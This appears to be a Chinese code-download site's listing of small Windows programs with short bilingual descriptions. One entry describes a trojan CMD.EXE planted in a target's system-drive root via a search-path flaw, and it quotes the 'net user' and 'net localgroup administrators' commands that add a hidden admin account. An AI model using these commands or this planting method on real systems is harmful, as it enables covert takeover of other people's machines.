-
mouse capture the primary process
鼠标捕捉的初级程序-mouse capture the primary process
- 2022-03-03 23:43:15下载
- 积分:1
-
a Web site's source code
一个网站的源代码-a Web site"s source code
- 2023-01-21 23:40:04下载
- 积分:1
-
使用Win32 File I/O API进行远程共享主机的文件操作的代码,附VB的演示程序!...
使用Win32 File I/O API进行远程共享主机的文件操作的代码,附VB的演示程序!-use Win32 File I/O API for remote file sharing mainframe operation of the code, with VB demo program!
- 2022-07-16 02:45:42下载
- 积分:1
-
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
- 2022-06-01 08:01:12下载
- 积分:1
-
windows ie security patches
windows ie安全补丁-windows ie security patches
- 2022-04-09 18:51:25下载
- 积分:1
-
用VC实现的一个邮件头过滤检测模块。 附调用例子
用VC实现的一个邮件头过滤检测模块。 附调用例子-with VC head of a mail filter detection module. Examples : Ca
- 2022-07-21 01:55:12下载
- 积分:1
-
基于winpcap 用于udp 数据包的捕获。用c++编写。
基于winpcap 用于udp 数据包的捕获。用c++编写。-the program is about capturing udp datasets
- 2022-02-07 12:28:00下载
- 积分:1
-
访问磁盘的剩余空间(3KB
获取磁盘剩余空间(3KB-access to the remaining disk space (3KB
- 2022-04-09 07:14:02下载
- 积分:1
-
利用Microsoft Internet Transfer Control下载Web页面
利用Microsoft Internet Transfer Control下载Web页面-download Web pages by Microsoft Internet Transfer Control
- 2022-05-29 06:57:40下载
- 积分:1
-
tracert程序,显示网络路由
tracert程序,显示网络路由-tracert procedures, showed network routing
- 2022-02-01 14:01:53下载
- 积分:1